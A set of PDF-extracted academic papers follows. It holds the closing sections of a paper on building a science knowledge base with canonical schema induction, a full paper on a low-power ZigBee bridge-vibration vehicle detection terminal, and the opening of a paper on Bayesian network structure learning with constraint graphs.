4). We can see that the pipeline take as input 7.5M OpenIE tuples with precision of 54% and produces a good quality science KB of over 340K facts with 80.6% precision organized into 15K schemas. The Table also shows that precision is largely preserved as we introduce phrasal triples and general tuples. 5.3 Evaluation of Canonical Schema Induction In this section we will focus on usefulness and cor- rectness of our canonical schema induction method. The parameters of the ILP model (see Equation 1) i.e., λ1 . . .λ5 and δ are tuned based on sample accu- racy of individual feature sources and using a small schema mapping problem with schemas applicable to vocabulary types Animal and Body-Part. λ1 = 0.7, λ2 = 0.9, λ3 = 0.3, λ4 = 0.1, λ5 = 0.2, δ = 0.7 Further, with O(n3) transitivity constraints we could not successfully solve a single ILP problem with 100 schemas within a time limit of 1 hour. Whereas, when we rewrite them with O(n2) con- straints as explained in Section 4.3, we could solve 443 ILP sub-problems within 6 minutes with aver- age runtime per ILP being 800 msec. 242 Canonical schema induction method Comprehensiveness None 20.0% AMIE* 20.9% CASI (our method) 23.2% Table 5: Use of the CASI-induced schemas significantly (at the 99% confidence level) improves comprehensive- ness of the KB. As discussed in Section 2, we not only cluster the (typed) relations, but also identify a canoni- cal relation that all the other relations in a cluster can be mapped to, without recourse to human an- notated training data or a target relational vocab- ulary. Although no existing methods do this di- rectly, the AMIE-based schema clustering method of (Galárraga et al., 2014) can be extended to do this by incorporating the association rules learned by AMIE (both typed and untyped) inside our ILP framework to output schema mapping rules. We call this exten- sion AMIE*, and use it as a baseline to compare the performance of CASI against. 5.3.1 Canonical Schema Usefulness The purpose of canonicalization is to allow equiv- alence between seemingly different schema to be recognized. For example, the KB query (“polar bear”, “reside in”, “tundra”)?9 can be answered by a KB triple (“polar bear”, “inhabit”, “tundra”) if schema mapping rules map one or both to the same canonical form e.g., (“polar bear”, “live in”, “tun- dra”) using the rules: (Animal, inhabit, Location) → (Animal, live in, Location) (Animal, reside in, Location) → (Animal, live in, Location) One way to quantitatively evaluate this is to mea- sure the impact of schema mapping on the com- prehensiveness metric. Table 5 shows that, before applying any canonical schema induction method, the comprehensiveness score of our KB was 20%. The AMIE* method improves this score to 20.9%, whereas our method achieves a comprehensiveness of 23.2%. This latter improvement over the original KB is statistically significant at the 99% confidence 9e.g., posed by a QA system trying to answer the question “Which is the likely location in which a polar bear to reside in? (A) Tundra (B) Desert (C) Grassland” level (sample size is the 4147 facts sampled from the reference corpus). 5.3.2 Canonical Schema Correctness A second metric of interest is the correctness of the schema mapping rules (just because comprehen- siveness improves does not imply every mapping rule is correct). We evaluate correctness of schema mapping rules using following metric: Precision of schema mapping rules: We asked Turkers to directly assess whether particular schema mapping rules were correct, for a random sample of rules. To make the task clear, Turkers were shown the schema mapping rule (expressed in En- glish) along with an example fact that was rewrit- ten using that rule (to give a concrete example of its use), and they were asked to select one option “correct or incorrect or unsure” for each rewrite rule. We asked this question to three different Turkers and considered the majority vote as final evaluation10. The comparison results are shown in Table 6. Starting with 15.8K schemas, AMIE* canonicalized only 822 of those into 102 canonical schemas (using 822 schema mapping rules). In contrast, our method CASI canonicalized 4.2K schemas into 2.5K canon- ical schemas. We randomly sampled 500 schema mapping rules generated by each method and asked Turkers to evaluate their correctness, as described earlier. As shown in Table 6, the precision of rules produced was CASI is 68%, compared with AMIE* which achieved 59% on this metric. Thus CASI could canonicalize five times more schemas with 9% more precision. 5.4 Discussion and Future Work Next, we identify some of the limitations of our ap- proach and directions for future work. 1. Extracting Richer Representations of Knowl- edge: While triples can capture certain kinds of knowledge, there are other kinds of information, e.g. detailed descriptions of events or processes, that cannot be easily represented by a set of independent tuples. An extension of this work would be to extract event frames, capable of representing a richer set of 10We discarded the unsure votes. For more than 95% of the rules, at least 2 out of 3 Turkers reached clear consensus on whether the rule is “correct vs. incorrect”, indicating that the Turker task was clearly defined. 243 Canonical schema #input #schema #induced Precision of induction method schemas mapping rules canonical schemas schema mapping rules AMIE* 15.8K 822 102 59% CASI (our method) 15.8K 4.2K 2.5K 68% Table 6: CASI canonicalizes five times more schemas than AMIE*, and also achieves a small (9%) increase in preci- sion, demonstrating how additional knowledge resources can help the canonicalization process (Section 4.2). Precision estimates are within +/-4% with 95% confidence interval. roles in a wider context compared to a triple fact. For example in the news domain, while representing an event “public shooting”, one would like to store the shooter, victims, weapon used, date, time, loca- tion and so on. Building high-precision extraction techniques that can go beyond binary relations to- wards event frames is a potential direction of future research. 2. Richer KB Organization: Our approach or- ganizes entities and relations into flat entity types and schema clusters. An immediate direction for ex- tending this work could be a better KB organization with deep semantic hierarchies for predicates and ar- guments, allowing inheritance of knowledge among entities and triples. 3. Improving comprehensiveness beyond 23%: Our comprehensiveness score is currently at 23% in- dicating 77% of potentially useful science facts are still missing from our KB. There are multiple ways to improve this coverage including but not limited to 1) processing more science corpora through our extraction pipeline, 2) running standard KB com- pletion methods on our KB to add the facts that are likely to be true given the existing facts, and 3) im- proving our canonical schema induction method fur- ther to avoid cases where the query fact is present in our KB but with a slight linguistic variation. 4. Quantification Sharpening: Similar to other KBs, our tuples have the semantics of plausibility: If the fact is generally true for some of the arg1s, then score it as true. Although frequency filtering typically removes facts that are rarely true for the arg1s, there is still variation in the quantifier strength of facts (i.e., does the fact hold for all, most, or some arg1s?) that can affect downstream inference. We are exploring methods for quantification sharpening, e.g., (Gordon and Schubert, 2010), to address this. 5. Can the pipeline be easily adapted to a new domain? Our proposed extraction pipeline expects high-quality vocabulary and types information as input. In many domains, it is easy to import types from existing resources like WordNet or FreeBase. For other domains like medicine, legal it might require domain experts to encode this knowledge. However, we believe that manually encoding types is a much simpler task as compared to manually defining all the schemas relevant for an individual domain. Further, various design choices, e.g., precision vs. recall tradeoff of final KB, the amount of expert input available, etc. would depend on the domain and end task requirements. 6 Conclusion Our goal is to construct, a domain-targeted, high precision knowledge base of (sub- ject,predicate,object) triples to support an ele- mentary science application. We have presented a scalable knowledge extraction pipeline that is able to extract a large number of facts targeted to a particular domain. The pipeline leveraging Open IE, crowdsourcing, and a novel schema learning algorithm, and has produced a KB of over 340,163 facts at 80.6% precision for elementary science QA. We have also introduced a metric of comprehen- siveness for measuring KB coverage with respect to a particular domain. Applying this metric to our KB, we have achieved a comprehensiveness of over 23% of science facts within the KB’s expressive power, substantially higher than the science coverage of other comparable resources. Most importantly, the pipeline offers for the first time a viable way of ex- tracting large amounts of high-quality knowledge targeted to a specific domain. We have made the KB publicly available at http://data.allenai. org/tuple-kb. 244 Acknowledgments We are grateful to Paul Allen whose long-term vision continues to inspire our scientific endeav- ors. We would also like to thank Peter Turney and Isaac Cowhey for their important contributions to this project. References S. Auer, C. Bizer, J. Lehmann, G. Kobilarov, R. Cyga- niak, and Z. Ives. 2007. DBpedia: A nucleus for a web of open data. In In ISWC/ASWC. Michele Banko, Michael J. Cafarella, Stephen Soderland, Matthew Broadhead, and Oren Etzioni. 2007. Open information extraction from the web. In IJCAI, vol- ume 7, pages 2670–2676. Jonathan Berant, Ido Dagan, and Jacob Goldberger. 2011. Global learning of typed entailment rules. In ACL. Kurt Bollacker, Colin Evans, Praveen Paritosh, Tim Sturge, and Jamie Taylor. 2008. Freebase: A collabo- ratively created graph database for structuring human knowledge. In SIGMOD. Thorsten Brants and Alex Franz. 2006. Web 1T 5- gram version 1 LDC2006T13. Philadelphia: Linguis- tic Data Consortium. Andrew Carlson, Justin Betteridge, Bryan Kisiel, Burr Settles, Estevam R Hruschka Jr, and Tom M Mitchell. 2010. Toward an architecture for never-ending lan- guage learning. In AAAI, volume 5, page 3. Bhavana Dalvi, Sumithra Bhakthavatsalam, Chris Clark, Peter Clark, Oren Etzioni, Anthony Fader, and Dirk Groeneveld. 2016. IKE - An Interactive Tool for Knowledge Extraction. In AKBC@NAACL-HLT. Luciano Del Corro, Rainer Gemulla, and Gerhard Weikum. 2014. Werdy: Recognition and disambigua- tion of verbs and verb phrases with syntactic and se- mantic pruning. In 2014 Conference on Empirical Methods in Natural Language Processing, pages 374– 385. ACL. Karthik Dinakar, Birago Jones, Catherine Havasi, Henry Lieberman, and Rosalind Picard. 2012. Common sense reasoning for detection, prevention, and mitiga- tion of cyberbullying. ACM Transactions on Interac- tive Intelligent Systems (TiiS), 2(3):18. Xin Dong, Evgeniy Gabrilovich, Geremy Heitz, Wilko Horn, Ni Lao, Kevin Murphy, Thomas Strohmann, Shaohua Sun, and Wei Zhang. 2014. Knowledge vault: a web-scale approach to probabilistic knowl- edge fusion. In KDD. Alexander Faaborg and Henry Lieberman. 2006. A goal- oriented web browser. In Proceedings of the SIGCHI conference on Human Factors in computing systems, pages 751–760. ACM. Anthony Fader, Stephen Soderland, and Oren Etzioni. 2011. Identifying relations for open information ex- traction. In Proceedings of the Conference on Empiri- cal Methods in Natural Language Processing, pages 1535–1545. Association for Computational Linguis- tics. ReVerb-15M available at http://openie. cs.washington.edu. Christiane Fellbaum. 1998. WordNet. Wiley Online Li- brary. Luis Galárraga, Christina Teflioudi, Katja Hose, and Fabian M. Suchanek. 2013. AMIE: association rule mining under incomplete evidence in ontological knowledge bases. In WWW. Luis Galárraga, Geremy Heitz, Kevin Murphy, and Fabian M. Suchanek. 2014. Canonicalizing open knowledge bases. In CIKM. Jonathan Gordon and Lenhart K Schubert. 2010. Quan- tificational sharpening of commonsense knowledge. In AAAI Fall Symposium: Commonsense Knowledge. Adam Grycner and Gerhard Weikum. 2014. Harpy: Hy- pernyms and alignment of relational paraphrases. In COLING. Adam Grycner, Gerhard Weikum, Jay Pujara, James R. Foulds, and Lise Getoor. 2015. RELLY: Inferring hy- pernym relationships between relational phrases. In EMNLP. Dekang Lin and Patrick Pantel. 2001. DIRT - discov- ery of inference rules from text. In Proceedings of the seventh ACM SIGKDD international conference on Knowledge discovery and data mining, pages 323– 328. ACM. Hugo Liu and Push Singh. 2004. ConceptNet: a prac- tical commonsense reasoning tool-kit. BT technology journal, 22(4):211–226. Mausam, Michael Schmitz, Stephen Soderland, Robert Bart, and Oren Etzioni. 2012. Open language learning for information extraction. In EMNLP. Andrea Moro and Roberto Navigli. 2012. WiSeNet: building a wikipedia-based semantic network with on- tologized relations. In CIKM. Patrick Pantel, Rahul Bhagat, Bonaventura Coppola, Timothy Chklovski, and Eduard H Hovy. 2007. ISP: Learning inferential selectional preferences. In HLT- NAACL, pages 564–571. Hannes Planatscher and Michael Schober. 2015. SCP solver. http://scpsolver.org. Simon Razniewski, Fabian M Suchanek, and Werner Nutt. 2016. But what do we actually know? In Proc. AKBC’16. Sebastian Riedel, Limin Yao, Andrew McCallum, and Benjamin M. Marlin. 2013. Relation extraction with 245 matrix factorization and universal schemas. In HLT- NAACL. Richard Socher, Danqi Chen, Christopher D. Manning, and Andrew Y. Ng. 2013. Reasoning with neural ten- sor networks for knowledge base completion. In NIPS. Stephen Soderland, John Gilmer, Robert Bart, Oren Et- zioni, and Daniel S. Weld. 2013. Open Information Extraction to KBP Relations in 3 Hours. In TAC. Robert Speer and Catherine Havasi. 2013. Concept- net 5: A large semantic network for relational knowl- edge. In The Peoples Web Meets NLP, pages 161–176. Springer. Gabriel Stanovsky and Ido Dagan. 2016. Creating a large benchmark for open information extraction. In EMNLP. Fabian M. Suchanek, Gjergji Kasneci, and Gerhard Weikum. 2007. Yago: A Core of Semantic Knowl- edge. In WWW. Niket Tandon, Gerard de Melo, Fabian Suchanek, and Gerhard Weikum. 2014. WebChild: Harvesting and Organizing Commonsense Knowledge from the Web. In WSDM. Peter D. Turney, Yair Neuman, Dan Assaf, and Yohai Co- hen. 2011. Literal and metaphorical sense identifica- tion through concrete and abstract context. In EMNLP. Travis Wolfe, Mark Dredze, James Mayfield, Paul Mc- Namee, Craig Harman, Timothy W. Finin, and Ben- jamin Van Durme. 2015. Interactive knowledge base population. CoRR, abs/1506.00301. Alexander Yates and Oren Etzioni. 2009. Unsupervised methods for determining object and relation synonyms on the web. Journal of Artificial Intelligence Research. 246 work_n7lby2rebfcctik64fikdfchni ---- DOI: 10.21307/ijanmc-2019-060 International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 65 Design of a Vibration Detection Terminal Guoshao Chen School of Computer Science and Engineering Xi’an Technological University Xi’an, China e-mail: 1825247141@qq.com Fei Xu School of Computer Science and Engineering Xi’an Technological University Xi’an, China e-mail: xinfei2000@qq.com Abstract—By detecting the vibration of bridge deck, the information of passing vehicles can be obtained indirectly, which is of great significance to grasp the dynamics of the enemy. In this paper, a micro-power wireless vibration detection terminal is designed. In order to reduce the overall power consumption of the terminal, which use two sensors, one is spring switch and another is acceleration sensor. When no vehicle passes by, the terminal is in a dormant state. When a vehicle passes by, the spring switch wakes up the CPU and the acceleration sensor to collect data. ZigBee network is used for data transmission, which has the advantages of low power consumption and ad hoc network. Experiments show that the average power consumption of the terminal is less than 7 mW. If the terminal is powered by 3.6v, 36AH lithium battery, In theory, it can work for at least two years. Keywords-Vibration Detection; Zigbee; Micro-power Consumption I. INTRODUCTION In the national defense and military affairs, the detection of passing vehicles in a specific area is of great significance for understanding each other's dynamics. The monitoring of bridge vibration can be more convenient to monitor vehicle dynamics. Considering the concealment, destructiveness and inconvenience of construction, this terminal uses wireless communication, battery power supply and micro-power design. Common wireless communication methods include Bluetooth technology, Wi-Fi technology, GPRS, ZigBee and so on. Because of the low power consumption of ZigBee network and autonomous network, this paper chooses ZigBee network. In order to achieve low power consumption, this paper considers two aspects, one is sensor power consumption, the other is processor power consumption. There are two sensors, spring switch and acceleration sensor. If there is no vehicle passing, the system will sleep deeply to save power. When there is a vehicle passing, the spring switch will wake up the CPU and the acceleration sensor will start collecting data. With regard to processor power consumption, the terminal uses CC2530 chip for ZigBee communication. Because the chip integrates mcs51 core processors, the power consumption is reduced without additional processors. The processor Computational ability is relatively low, so the calculation of signal filtering and recognition is completed by the server. The detection terminal is responsible for signal acquisition and communication tasks. In this paper, a micro-power vehicle vibration detection terminal is designed, which uses dual sensors to reduce power consumption, ZigBee wireless communication and battery power supply. At the same time, the communication reliability is guaranteed and the low power consumption is taken into account by waking up the communication at a fixed time. The detection terminal can meet the requirements of long-term maintenance-free work. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 66 II. PRINCIPLE When vehicles pass the bridge, the vibration caused by the vehicles pass the bridge deck is violently than that pass the ground. Therefore, this paper obtains vehicle information by detecting the vibration of the bridge deck. When there is no vehicle passing, the detection terminal is in deep sleep state, CPU sleep, acceleration sensor and data memory power off, thus saving electricity. Once a vehicle passes by, the bridge vibration triggers the spring switch, wakes up the CPU, the switch opens, so the acceleration sensor starts to detect the bridge deck vibration amplitude, and the data is stored in the memory. When ZigBee network transmits data, it needs enough routing nodes to be awakened. Therefore, in order to ensure that ZigBee network works simultaneously, the terminal uses the method of periodic wake-up. During the wake-up period, data is transmitted to the server for processing and identification. III. LOW POWER IMPLEMENTATION In order to meet the battery power supply, maintenance-free long-term use, the terminal must reduce power consumption. This paper solves the problem of low power consumption from three aspects: hardware, communication and software. The hardware is designed with dual sensors, low power CPU, power switch and unnecessary equipment shut down during sleep. ZigBee is used in communication, because of its advantages of ad hoc network, it can achieve low power relay transmission of data. In order to achieve low power consumption, to not lose information, on software, data acquisition using external interrupt mode, communication using timing wake-up mode. IV. HARDWARE ARCHITECTURE Figure 1. Hardware structure is shown Figure 2. Switch structure The overall hardware structure is shown in Figure 1. The spring switch is connected to the external interruption pin of the CPU. When no vehicle passes by, the spring switch breaks the power, no current passes through, and the power consumption of the spring switch is zero. When a vehicle passes by, the spring switch triggers the interruption and wakes up the CPU. The structure of the spring switch is shown in Figure 2. The center position is the wire and the surrounding is the spring. The vibration causes the short circuit between the spring and the wire, thus triggering the external interruption of the CPU. Vibration sensor adopts three-axis acceleration sensor. When the CPU is dormant, the vibration sensor is International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 67 disconnected to save power. When the CPU is awakened, the acceleration sensor is energized and starts to work. The clock is powered by a single battery using a DS1307 chip. The memory uses AT25DF641 to store the data of acceleration sensor temporarily, waiting for the arrival of the next communication cycle. The battery uses a disposable lithium battery with a capacity of 36 ah and a voltage of 3.6 v. The communication adopts ZigBee wireless mode. In order to save power, instead of increasing the CPU, the data acquisition and communication are carried out by using the 51 single chip microprocessor core integrated with cc2530. The power supply control is realized by electronic programmable switch ADG821, which can realize the maximum 150 mA current output capacity, short switching time and low power consumption. V. OVERVIEW OF ZIGBEE NETWORK ESTABLISHMENT Establishing a complete ZigBee mesh network consists of two steps: network initialization and node joining the network. There are two steps for a node to join the network: to connect to the network through a coordinator and to access the network through an existing parent node. A. Initialize network coordinator Firstly, it judges whether the node is a FFD node, and then it judges whether the FFD node has a coordinator in other networks or in other networks. Through active scanning, send a Beacon request command, and then set a scan duration . If no beacon is detected during the scan period, then FFD has no coordinator in its pos, then it can establish its own ZigBee network, and as the coordinator of this network, it generates beacons continuously and extensively. Broadcast. In a network, there is only one coordinator. Initialize network coordinators shown in Figure 3. Figure 3. Initialize network coordinator B. Channel scanning process It includes two processes: energy scanning and active scanning. Firstly, it detects the energy of the designated channel or the default channel to avoid possible interference. Channels are sequenced incrementally to discard those channels whose energy values exceed the allowable energy level. Channels with allowable energy level are selected and labeled as available channels. Then active scanning is carried out to search the network information within the communication radius of the node. These messages are broadcast in the form of beacon frames in the network. Nodes obtain these beacon frames through active channel scanning. Then, according to these information, they find the best and relatively quiet channel. Through recording results, they select a channel, which should have the least ZigBee network, preferably without ZigBee devices. During active scanning, the MAC layer discards all frames received by the PHY layer data service except beacons. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 68 C. Set up the network ID When the appropriate channel is found, the coordinator will select a network identifier (PAN ID, value (= 0x3FFF) for the network. This ID must be unique in the channel used, cannot conflict with other ZigBee networks, and cannot be used as the broadcast address 0xFFFF (this address is reserved address, can not be used). PAN IDs can be obtained by listening to the IDs of other networks and selecting a non-conflicting ID, or by artificially specifying the scanning channels to determine the PAN IDs that do not conflict with other networks. There are two address modes in ZigBee network: extended address (64 bits) and short address (16 bits), where extended address is allocated by IEEE organization for unique device identification; short address is used for device identification in local network. In a network, the short address of each device must be unique. When a node joins the network, it is allocated by its parent node and communicated by using short address. For coordinators, the short address is usually set to 0x0000. After the above steps are completed, the ZigBee mesh network is successfully initialized, and then waiting for other nodes to join. When the node enters the network, the parent node (including the coordinator) with the strongest signal in the range of choice will join the network. After success, it will get a short address of the network and send and receive data through this address. The network topology and address will be stored in their flash. D. Nodes join the network through Coordinator When the node coordinator is determined, the node first needs to establish a connection with the coordinator to join the network. In order to establish a connection, FFD nodes need to make a request to the coordinator. After receiving the connection request, the coordinator decides whether to allow the connection, and then responds to the node requesting the connection. Only when the node and the coordinator establish a connection, can the data be sent and received. The specific process of node joining the network can be divided into the following steps: Nodes join the network is shown in Figure 4. Figure 4. Nodes join the network E. Find the network coordinator Firstly, the coordinator of the surrounding network will be scanned actively. If the beacon is detected within the scanning period, the relevant information of the coordinator will be obtained, and then a connection request will be sent to the coordinator. After selecting the appropriate network, the upper layer will request the MAC layer to set the PIB attributes of PHY and MAC layer, such as phyCurrent Channel and macPANID. If not detected, after a period of time, the node re-initiates the scan. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 69 F. Send the Associate Request command The node sends the association request command to the coordinator. The coordinator replies to an acknowledgment frame (ACK) immediately after receiving it, and sends the connection instruction primitive to its upper layer to indicate that the connection request of the node has been received. This does not mean that a connection has been established, but only that the coordinator has received a connection request from the node. When the upper MAC layer of the coordinator receives the connection instruction primitive, it will decide whether to grant the join request of the node according to its own resource (storage space and energy), and then send a response to the MAC layer of the node. G. Wait for the coordinator to process When the node receives ACK from the coordinator to join the association request command, the node Mac will wait for a period of time to receive the coordinator's connection response. If a connection response is received within a predetermined time, it notifies its upper layer of the response. When the coordinator sends a response to the MAC layer of the node, it sets a waiting response time (T_Response WaitTIme) to wait for the coordinator to process the request command. If the coordinator has enough resources, the coordinator assigns a 16-bit short address to the node and generates a connection response command containing the new address and the successful status of the connection, then the node will succeed in building the coordinator. Vertical connection and start communication. If the coordinator resources are insufficient, the nodes to be joined will resend the request information and enter the network successfully. H. Send data request commands If the coordinator agrees to join the node in response time, the Associate Response command is generated and stored. When the response time is over, the node sends the data request command to the coordinator. The coordinator replies to the ACK immediately after receiving the command, and then sends the stored related response command to the node. If the coordinator hasn't decided whether to agree to join the node after the response time arrives, then the node will try to extract the related response command from the beacon frame of the coordinator. If successful, the network can be accessed successfully. Otherwise, the request information will be re-sent until the network is successfully accessed. I. Reply When the node receives the correlation response command, it immediately replies an ACK to the coordinator to confirm that it receives the connection response command. At this time, the node will save the short address and extended address of the coordinator, and the MLME of the node sends the connection confirmation primitive to the upper layer to notify the success of the association. J. Nodes join the network through existing nodes When the FFD nodes close to the coordinator are successfully associated with the coordinator, the other nodes within the scope of the network join the network with these FFD nodes as their parent nodes. There are two ways to join the network, one is through association, that is, the joining nodes initiate joining the network; the other is direct, that is, the joining nodes. The volume is added to that node as a child of that node. The association mode is the main way for new nodes to join the ZigBee network. For a node, only if it has not joined the network can it join the network. Some of these nodes have joined the network but lost contact with their parents (such as orphan nodes), while others are new nodes. When an orphan node is an orphan node, the information of the original parent node is stored in its adjacent table, so it can send the request information of the original parent node to join the network directly. If the parent node has the ability to consent to its joining, it will enter the network successfully by directly telling its previously International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 70 assigned network address; if the number of child nodes in its original parent node's network has reached the maximum, that is to say, the parent node can not approve its joining, it can only find and join the network as a new node. For a new node, it first scans the network it can find on one or more pre-set channels actively or passively, searches for the parent node that has the ability to authorize itself to join the network, and stores the data of the parent node that can be found in its adjacent table. Data stored in parent nodes of adjacent tables includes ZigBee protocol version, protocol stack specification, PAN ID and information that can be added. Choose one of the smallest parent nodes in the adjacent table and send a request message to it. If there are more than two parent nodes with the same minimum depth, then randomly select one to send the request. If there is no suitable parent information in the adjacent tables, it means that the access process fails and terminates. If the request is approved, then the parent node will also allocate a 16-bit network address, at which time the network entry is successful, and the child node can start communication. If the request fails, look up the adjacent table again and continue sending the request information until joining the network. VI. SOFTWARE DESIGN A. Introduction to Working Schedule The software work schedule is shown in Figure 5. data is transmitted by relay mode to achieve low power consumption. Therefore, in order to transmit data, it is necessary to wake up all nodes at the same time. The communication wake-up period is T. The selection of T value is based on the size of RAM capacity, the frequency of vehicle passing and the real-time requirement of data transmission. In each cycle, once a vehicle passes by, the sensor collects data, and the CPU stores the data in RAM. After data acquisition, it enters a deep dormant state, waiting for the next vehicle to pass or the next communication wake-up cycle. Figure 5. Software work schedule B. Flow Chart Brief Introduction The system software mainly consists of three parts: main function, data acquisition function and communication function. The main function mainly completes the setting of startup parameters and entering the dormant state. Data acquisition function uses external interrupt wake-up. Communication function uses timer interrupt wake-up. The main function is relatively simple, and it is no longer necessary to elaborate. The following is a brief introduction of the two interrupt functions. The flow chart of the data acquisition function is shown in Figure 6. When the vehicle passes by, the vibration switch is triggered and the CPU enters the external interrupt function. After external interruption wakes up the CPU, the power supply of each device is turned on through ADG821, and the data of acceleration sensor is collected, which is temporarily International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 71 stored in the data memory. The terminal collects data and keeps it until no vehicle passes by. After all the vehicles passed, the CPU turned off the power through ADG821, and the terminal went to sleep. The communication function is shown in Figure 7. When the communication time arrives, the timer wakes up the cpu, detects the wireless signal, and waits for the central node to be ready. After Zigbee is successfully networked, each terminal uploads data in turn. If the network is idle after the transmission is completed, it will enter a dormant state. If there is no vehicle passing in the communication process, the sensor power supply need not be turned on. Figure 6. Data acquisition function Figure 7. Communication function VII. CONCLUSION After the prototype is completed, it is placed outdoors for power consumption test. The outdoor ambient temperature ranges from - 5 C to 20 C, and the relative humidity ranges from 20% to 80%. In order to better simulate the vehicle and environment on site, data acquisition is carried out under the viaduct deck during the construction period. The weight and speed of construction vehicles are closer to the field vehicles than those of ordinary household cars. the average power consumption under different working conditions is: no more than 0.1 mW in dormant state, 120 mW in vehicle passing and 200 mW in communication. The average power consumption of the whole day is 162 mWH based on 30 minutes of vehicle passing time and 30 minutes of communication. The selected batteries are 36AH, 3.6V and the total power is 129.6WH. Considering the factors such as battery self-discharge, conservative estimates can work for 1000 days to meet the initial design requirements, that is, the equipment can work for at least two consecutive years. The data packet loss rate of wireless communication is less than 1%, and the failure rate of long-time equipment has not been tested yet. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 72 This paper designs a micro-power bridge deck vibration detection terminal, which uses wireless ZigBee communication, can flexibly network, long-distance low-power transmission, and control the power consumption of hardware, so as to achieve micro-power work. Experiments show that disposable lithium batteries can work for more than two years. The detection terminal has strong concealment and simple construction, so it has good prospects in frontier monitoring and battlefield perception. ACKNOWLEDGMENT Fund Name: National and local joint engineering laboratory of new network and test control Fund Number: GSYSJ2017003 REFERENCE [1] Design of a Vibration Data Acquisition Device Yin Ming Wang Pingping Equipment Manufacturing Technology Issue 2018 [2] Design of an ultra-low power wireless vibration sensorXiuwei State Tang Shengwu Sensors and MicrosystemsVolume 35, Volume 2, 2016 [3] Vibration Detection of Ship Driving System Based on Sensor Network Feng Gang and Cai DonglingShip Science and TechnologyVolume 40, No. 12a, December 2018 [4] Design of Network Monitoring System for Oilfield Water Injection Wellblock. You Bo，Zhang Haitao，Jia Deli.Journal of Xi'an Shiyou University(Natural Science Edition), 2016, 9: vol31 no5. [5] Research on implementation technology of ZigBee wireless communication protocol[J] ． Ren Xiuli ， Yu Haibin. Computer Engineering and Applications, 2007 [6] Design of oilfield wireless monitoring system based on WiFi and Zig-Bee[J]. Cao Qinghua, Liu Chang，Meng Kaiyuan. Journal of Xi’an Petroleum University (NaturalScience Edition), 2015, 30(3): 101-102． [7] Based on ZigBee oil well remote monitoring system designand implementation[J]. Zhang Xiaohua, Zhang Wenfang, ShiRudong，et al． Control Engineering, 2013, 20 work_nbt6xi4mqjfi3ak2y5mzy6dndi ---- Submitted 13 March 2017 Accepted 7 June 2017 Published 3 July 2017 Corresponding author Jacob M. Schreiber, jmschr@cs.washington.edu Academic editor Jingbo Wang Additional Information and Declarations can be found on page 14 DOI 10.7717/peerj-cs.122 Copyright 2017 Schreiber and and Noble Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Finding the optimal Bayesian network given a constraint graph Jacob M. Schreiber1 and William S. Noble2 1 Department of Computer Science, University of Washington, Seattle, WA, United States of America 2 Department of Genome Science, University of Washington, Seattle, WA, United States of America ABSTRACT Despite recent algorithmic improvements, learning the optimal structure of a Bayesian network from data is typically infeasible past a few dozen variables. Fortunately, domain knowledge can frequently be exploited to achieve dramatic computational savings, and in many cases domain knowledge can even make structure learning tractable. Several methods have previously been described for representing this type of structural prior knowledge, including global orderings, super-structures, and constraint rules. While super-structures and constraint rules are flexible in terms of what prior knowledge they can encode, they achieve savings in memory and computational time simply by avoiding considering invalid graphs. We introduce the concept of a ‘‘constraint graph’’ as an intuitive method for incorporating rich prior knowledge into the structure learning task. We describe how this graph can be used to reduce the memory cost and computational time required to find the optimal graph subject to the encoded constraints, beyond merely eliminating invalid graphs. In particular, we show that a constraint graph can break the structure learning task into independent subproblems even in the presence of cyclic prior knowledge. These subproblems are well suited to being solved in parallel on a single machine or distributed across many machines without excessive communication cost. Subjects Artificial Intelligence, Data Mining and Machine Learning, Data Science, Distributed and Parallel Computing Keywords Bayesian network, Structure learning, Discrete optimization, Parallel processing, Big data INTRODUCTION Bayesian networks are directed acyclic graphs (DAGs) in which nodes correspond to random variables and directed edges represent dependencies between these variables. Conditional independence between a pair of variables is represented as the lack of an edge between the two corresponding nodes. The parameters of a Bayesian network are typically simple to interpret, making such networks highly desirable in a wide variety of application domains that require model transparancy. Frequently, one does not know the structure of the Bayesian network beforehand, making it necessary to learn the structure directly from data. The most intuitive approach to the task of Bayesian network structure learning (BNSL) is ‘‘search-and-score,’’ in which one iterates over all possible DAGs and chooses the one that optimizes a given scoring function. Recent work has described methods that find the optimal Bayesian network structure without explicitly considering all possible DAGs (Malone, Yuan & Hansen, 2011; Yuan, Malone & How to cite this article Schreiber and and Noble (2017), Finding the optimal Bayesian network given a constraint graph. PeerJ Comput. Sci. 3:e122; DOI 10.7717/peerj-cs.122 https://peerj.com mailto:jmschr@cs.washington.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.122 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.122 Wu, 2011; Fan, Malone & Yuan, 2014; Jaakkola et al., 2003), but these methods are still infeasible for more than a few dozen variables. In practice, a wide variety of heuristics are often employed for larger datasets. These algorithms, which include branch-and- bound (Suzuki, 1996), Chow-Liu trees (Chow & Liu, 1968), optimal reinsertion (Moore & Wong, 2003), and hill-climbing (Tsamardinos, Brown & Aliferis, 2006), typically attempt to efficiently identify a structure that captures the majority of important dependencies. In many applications, the search space of possible network structures can be reduced by taking into account domain-specific prior knowledge (Gamberoni et al., 2005; Zuo & Kita, 2012; Schneiderman, 2004; Zhou & Sakane, 2003). A simple method is to specify an ordering on the variables and require that parents of a variable must precede it in the ordering (Cooper & Herskovits, 1992). This representation leads to tractable structure learning because identifying the parent set for each variable can be carried out independently from the other variables. Unfortunately, prior knowledge is typically more ambiguous than knowing a full topological ordering and may only exist for some of the variables. A more general approach to handling prior knowledge is to employ a ‘‘super-structure,’’ i.e., an undirected graph that defines the super-set of edges defining valid learned structures, forbidding all others (Perrier, Imoto & Miyano, 2008). This method has been fairly well studied and can also be used as a heuristic if defined through statistical tests instead of prior knowledge. A natural extension of the undirected super-structure is the directed super-structure (Ordyniak & Szeider, 2013), but to our knowledge the only work done on directed super-structures proved that an acyclic directed super-structure is solvable in polynomial time. An alternate, but similar, concept is to define which edges must or cannot exist as a set of rules (Campos & Ji, 2011). However, these rule-based techniques do not specify how one would exploit the constraints to 